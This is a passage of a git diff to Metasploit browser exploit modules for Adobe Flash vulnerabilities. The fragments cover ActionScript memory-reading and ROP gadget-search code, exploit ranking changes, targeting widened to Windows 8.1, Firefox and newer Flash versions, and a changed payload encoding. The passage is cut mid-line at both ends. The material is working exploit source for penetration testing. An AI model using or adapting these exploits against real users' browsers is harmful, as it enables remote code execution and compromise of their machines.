byte_read(addressOfNames + i * 4) - bv[6401].position = addr + entry - if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break - } - return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) - } - - private function gadget(gadget:String, hint:uint, addr:uint):uint - { - var find:uint = 0 - var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) - var value:uint = parseInt(gadget, 16) - for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break - return addr + i - } - } -} diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index f95e2f8dba..1182b2f2b7 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index 2b401c731b..fccecf14f9 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb index dfae2693d6..77e8ce5cbe 100644 --- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -6,9 +6,8 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking - include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) @@ -47,9 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - :os_name => OperatingSystems::Match::WINDOWS_7, - :ua_name => Msf::HttpClients::IE, - :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') }, + :os_name => lambda do |os| + os =~ OperatingSystems::Match::WINDOWS_7 || + os =~ OperatingSystems::Match::WINDOWS_81 + end, + :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) }, + :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.179') }, :arch => ARCH_X86 }, 'Targets' => @@ -82,17 +84,18 @@ class Metasploit3 < Msf::Exploit::Remote def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) - psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) - b64_payload = Rex::Text.encode_base64(psh_payload) + b64_payload = Rex::Text.encode_base64(target_payload) + platform_id = 'win' + os_name = target_info[:os_name] html_template = %Q| - + - +